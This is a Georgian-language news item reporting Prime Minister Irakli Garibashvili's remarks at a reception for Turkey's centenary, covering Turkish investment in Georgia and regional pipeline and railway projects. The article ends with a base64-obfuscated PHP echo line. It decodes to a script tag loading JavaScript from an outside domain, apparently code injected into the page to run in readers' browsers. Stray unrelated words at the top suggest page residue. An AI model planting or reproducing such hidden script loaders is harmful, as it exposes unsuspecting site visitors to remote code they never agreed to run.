celsiusi
ავერსი საქკაბელი

 მოხარული ვართ, რომ თურქული კომპანიები აგრძელებენ ინვესტირებას საქართველოს ეკონომიკაში, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა თურქეთის რესპუბლიკის 100 წლის იუბილესადმი მიძღვნილ საზეიმო მიღებაზე სიტყვით გამოსვლისას განაცხადა.

„მოხარული ვართ, რომ თურქული კომპანიები აგრძელებენ ინვესტირებას საქართველოს ეკონომიკაში და პირდაპირი უცხოური ინვესტიციების მაჩვენებელმა უკვე თითქმის 370 მილიონ აშშ დოლარს მიაღწია ბოლო სამი წლის განმავლობაში; ხოლო თურქული კომპანიების რიცხვი საქართველოში 10 000-ს აჭარბებს. ჩვენ ველით ამ რიცხვების შემდგომ ზრდას მომდევნო წლებშიც. ჩვენი ქვეყნების სტრატეგიული მდებარეობიდან გამომდინარე, როგორც საქართველო, ასევე თურქეთი ასრულებენ გადამწყვეტ - ევროპასა და აზიას შორის დამაკავშირებელი რგოლის - როლს. სწორედ ამიტომ, შუა დერეფნის მეშვეობით დაკავშირებადობის გაზრდის მიზნით ისეთი სფეროები, როგორებიცაა ტრანსპორტი და ენერგეტიკა, დარჩება ჩვენს ერებს შორის ურთიერთობების გაღრმავების მამოძრავებელ ძალად. მოხარული ვარ, რომ ჩვენი ქვეყნები მიისწრაფვიან არსებული და დაგეგმილი რეგიონული ენერგეტიკული და ინფრასტრუქტურული პროექტების, მათ შორის − ბაქო-თბილისი-ჯეიჰანისა და ბაქო-თბილისი-ერზრუმის მილსადენის, ასევე − ბაქო-თბილისი-ყარსის სარკინიგზო და სხვა პროექტების განხორციელებისკენ“, - თქვა ღარიბაშვილმა.

მისივე თქმით, ორი ქვეყნის თანამშრომლობა ფასდაუდებელია არა მხოლოდ ორმხრივი ეკონომიკური მიღწევების თვალსაზრისით, არამედ რეგიონში მშვიდობის, სტაბილურობისა და კეთილდღეობის უზრუნველსაყოფად, განსაკუთრებით უსაფრთხოების არსებული საგანგაშო გარემოს გათვალისწინებით როგორც რეგიონში, ისე გლობალურად.

„დარწმუნებული ვარ, საქართველოსა და თურქეთს შორის არსებული შესანიშნავი ურთიერთობები და თანამშრომლობა გაგრძელდება და გაძლიერდება; ხოლო ჩვენი პარტნიორობა განუზომელ როლს ითამაშებს ჩვენი ყველა ინიციატივის განხორციელებაში როგორც ორმხრივ და რეგიონულ, ისე მრავალმხრივ დონეზე. ყოველივე ეს ხელს შეუწყობს ნათელი მომავლის შექმნას ჩვენი ქვეყნებისთვის, ერებისა და სრულიად რეგიონისთვის“, - თქვა ღარიბაშვილმა.

186
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");